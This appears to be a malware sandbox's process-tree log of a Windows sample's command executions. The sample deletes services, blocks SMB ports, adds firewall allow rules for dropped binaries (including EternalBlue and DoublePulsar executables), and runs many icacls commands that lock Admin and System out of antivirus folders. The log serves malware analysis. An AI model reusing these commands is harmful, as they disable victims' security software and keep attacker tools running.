C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:980
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:1960
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:2464
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵PID:3796
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵
- System Location Discovery: System Language Discovery
PID:4400 -
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵
- System Location Discovery: System Language Discovery
PID:1792 -
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:3088
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
PID:4268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:4160
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:3800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:5024
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:1756
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵PID:2888
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵
- System Location Discovery: System Language Discovery
PID:216 -
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:4356
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:4616
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:1344
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:3400
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:892
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:4068
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:3672
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:1556
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4160
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:3940
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:4204
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1960
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:1344
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵PID:4676
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵PID:2464
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵PID:5056
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:3472 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵PID:3668
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵PID:1408
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:4544
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
- System Location Discovery: System Language Discovery
PID:2664 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
- System Location Discovery: System Language Discovery
PID:2856 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:3116 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:4336
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:536
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:1344
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:3624
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:228
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4584 -
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2304 -
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1400 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1672
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:3484
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:4356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4460
-
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2536 -
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:3144
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵PID:3864
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:4608 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:2000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2060
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:4024
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:1244
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:2304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:4140
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3624
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:2432
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:4688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1816 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3400
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:4728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2664
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵PID:3612
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:4916
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:4572
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4068
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵PID:3032
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:3988
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:4688
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:3796
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:2536
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵PID:3220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:232
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵PID:2756
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:1564
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:3440
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:1952
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:3796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵PID:4372
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:2304
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2000
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵PID:2628
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵PID:3696
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵PID:1792
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:1564
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4360
-
-
-
